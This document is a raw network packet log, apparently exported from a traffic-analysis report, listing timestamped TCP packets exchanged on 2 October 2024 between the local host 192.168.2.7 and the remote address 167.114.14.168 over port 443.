                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.537933111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.537978888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.538019896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.538127899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.538151026 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.538219929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.538227081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.538280964 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.553860903 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.553889036 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.553965092 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.553991079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554029942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554259062 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554275036 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554321051 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554327965 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554373026 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554867029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554886103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554927111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554935932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554986954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.554986954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.555282116 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.555299044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.555330038 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.555335045 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.555362940 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.555391073 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.555586100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.555600882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.555653095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.555658102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.555691004 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.556068897 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.556083918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.556149960 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.556155920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.556197882 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.556548119 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.628585100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.628667116 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.628680944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.628710985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.628727913 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.628756046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.628897905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.628953934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.628967047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.628984928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.629009962 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.629026890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.644659042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.644704103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.644738913 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.644754887 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.644777060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.644793034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645066023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645111084 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645128965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645138979 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645164967 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645184040 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645353079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645410061 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645421028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645447016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645498037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645517111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645890951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645936012 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645983934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.645992994 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.646037102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.646317005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.646373034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.646398067 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.646405935 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.646415949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.646435976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.646898985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.646953106 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.646965027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.646977901 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.647007942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.647022963 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719327927 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719377041 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719490051 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719541073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719566107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719580889 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719746113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719785929 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719810963 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719820023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719841957 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.719861984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735197067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735256910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735276937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735306025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735322952 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735346079 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735639095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735682011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735698938 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735707998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735733032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.735754013 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736175060 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736216068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736241102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736248970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736576080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736617088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736617088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736625910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736634016 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736654043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736680031 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.736704111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737034082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737073898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737102032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737109900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737124920 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737143040 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737436056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737493038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737500906 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737518072 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737544060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.737560034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.809736013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.809751034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.809885025 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.809923887 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.809962988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.810034990 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.810049057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.810097933 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.810106993 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.810139894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.825997114 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.826010942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.826113939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.826147079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.826189995 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.826261997 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.826273918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.826343060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.826349974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.826397896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.826967001 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.826981068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827024937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827037096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827059984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827080011 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827255964 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827275038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827323914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827332973 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827369928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827802896 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827816963 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827879906 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827888966 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.827924013 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.895827055 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.895852089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.895992041 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.896044016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.896086931 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.900177002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.900194883 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.900262117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.900286913 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.900322914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.916096926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.916121006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.916363955 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.916398048 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.916414976 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.916435003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.916443110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.916450024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.916500092 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.917002916 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.917016029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.917089939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.917098999 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.917135954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.917506933 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.917521000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.917573929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.917582989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.917618036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.918351889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.918369055 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.918421984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.918432951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.918467999 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.919867992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.919884920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.919954062 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.919965982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.920002937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.987291098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.987312078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.987436056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.987472057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:56.987536907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.135215998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.135241032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.135469913 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.135505915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.135548115 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.195523024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.195548058 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.195645094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.195683002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.195729017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.241149902 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.241175890 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.241240978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.241270065 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.241357088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.270880938 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.270909071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.271018982 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.271049976 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.271092892 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.301615953 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.301649094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.301764011 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.301811934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.301865101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.324649096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.324677944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.324789047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.324834108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.324877977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.346426010 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.346452951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.346532106 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.346570015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.346609116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.360378027 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.360402107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.360464096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.360481024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.360517025 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.373292923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.373317003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.373359919 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.373385906 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.373405933 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.373426914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:57.384424925 CEST44349713167.114.14.168192.168.2.7
